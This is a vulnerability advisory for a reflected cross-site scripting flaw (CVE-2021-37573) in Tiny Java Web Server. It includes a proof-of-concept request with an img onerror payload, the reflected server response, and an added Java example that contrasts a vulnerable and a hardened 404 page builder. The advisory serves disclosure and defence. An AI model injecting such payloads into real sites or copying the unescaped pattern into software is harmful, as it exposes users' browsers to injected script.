Tiny Java Web Server 1.115 Cross Site Scripting
Posted Aug 14, 2021
Authored by Maurizio Ruchay | Site syss.de

Tiny Java Web Server and Servlet Container versions 1.115 and below suffer from a cross site scripting vulnerability.

tags | exploit, java, web, xss
advisories | CVE-2021-37573
SHA-256 | 32008168ce6c6acfd2f9997496c840696b8c89f0bb121038eadaf5c24045103a

Advisory ID: SYSS-2021-042
Product: Tiny Java Web Server and Servlet Container (TJWS)
Manufacturer: D. Rogatkin
Affected Versions: <= 1.115
Tested Versions: 1.107, 1.114
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2021-07-21
Solution Date: 2021-07-23
Public Disclosure: 2021-08-03
CVE Reference: CVE-2021-37573
Author of Advisory: Maurizio Ruchay, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Tiny Java Web Server and Servlet Container (TJWS) is a lightweight web
server written in Java.

The manufacturer describes the product as follows (see [1]):
"The Miniature Java Web Server is built as a servlet container with HTTPD
servlet providing standard Web server functionality."

Due to improper input validation, the application is vulnerable to a
reflected cross-site scripting attack.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The requested URL path is reflected into the server's "404 Page Not Found"
error page without HTML encoding, so JavaScript code can be injected into
that page.

Because the input is not properly validated or encoded before being
reflected back, the injected code is executed in a victim's browser.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following GET request shows how JavaScript code can be placed on
the page:

===
HTTP request:
GET /te%3Cimg%20src=x%20onerror=alert(42)%3Est HTTP/1.1
[...]
Connection: close


HTTP response:
HTTP/1.1 404 te<img src=x onerror=alert(42)>st not found
server: D. Rogatkin's TJWS (+Android, JSR340, JSR356) https://github.com/drogatkin/TJWS2.git/Version 1.114
[...]
content-length: 338
connection: close

<HTML><HEAD><TITLE>404 te<img src=x onerror=alert(42)>st not
found</TITLE></HEAD><BODY BGCOLOR="#D1E9FE">
[...]
<H2>404 te<img src=x onerror=alert(42)>st not found</H2>
[...]
===

If a browser renders the response, the JavaScript code is executed
showing the message "42".
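The response above reflects the decoded path straight into the title, heading and even the HTTP reason phrase. The following illustrative Java class is an added example, not TJWS code or the vendor's fix: it places a raw-concatenation 404 builder next to a hardened one that HTML-encodes the path once at the point of output and keeps the reason phrase fixed, then checks both with the decoded PoC path.

```java
/** Added example (not TJWS code): vulnerable and hardened 404 page builders. */
public final class SafeNotFoundPage {

    /** Encode the five characters that can break out of HTML text or attribute context. */
    public static String escapeHtml(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '&':  sb.append("&amp;");  break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    /** Vulnerable shape: the decoded path is concatenated into markup unchanged,
     *  matching the structure of the response in the advisory. */
    public static String vulnerablePage(String decodedPath) {
        return "<HTML><HEAD><TITLE>404 " + decodedPath + " not found</TITLE></HEAD>"
             + "<BODY><H2>404 " + decodedPath + " not found</H2></BODY></HTML>";
    }

    /** Hardened shape: same layout, path encoded exactly once when written into HTML.
     *  The HTTP reason phrase should stay a constant ("Not Found") and never carry input. */
    public static String safePage(String decodedPath) {
        String p = escapeHtml(decodedPath);
        return "<HTML><HEAD><TITLE>404 " + p + " not found</TITLE></HEAD>"
             + "<BODY><H2>404 " + p + " not found</H2></BODY></HTML>";
    }

    public static void main(String[] args) {
        // Constructed input: the URL-decoded path from the advisory's PoC request.
        String path = "te<img src=x onerror=alert(42)>st";
        String unsafe = vulnerablePage(path);
        String safe = safePage(path);
        // The tag survives in the vulnerable page and is neutralised in the hardened one.
        System.out.println(unsafe.contains("<img") ? "vulnerable: tag reaches the browser" : "?");
        System.out.println(safe.contains("<img") ? "FAIL" : "hardened: " + safe);
    }
}
```

A regression test for this class of bug is simply asserting that the rendered error page never contains the literal `<` or `>` from the request path.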

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The issue has been addressed in release version 1.116 [2].
Therefore, all instances of TJWS should be updated to this version.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-07-02: Vulnerability discovered
2021-07-21: Vulnerability reported to manufacturer
2021-07-23: Patch released by manufacturer
2021-08-03: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Tiny Java Web Server and Servlet Container (TJWS):
http://tjws.sourceforge.net/
[2] Patch release on GitHub:
https://github.com/drogatkin/TJWS2/releases/tag/v1.116
[3] SySS Responsible Disclosure Policy:
https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Maurizio Ruchay of SySS GmbH.

E-Mail: maurizio.ruchay@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Maurizio_Ruchay.asc
Key ID: 0xC7D20E267F0FA978
Key Fingerprint: D506 AB5A FE3E 09AE FFBE DEB2 C7D2 0E26 7F0F A978

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en
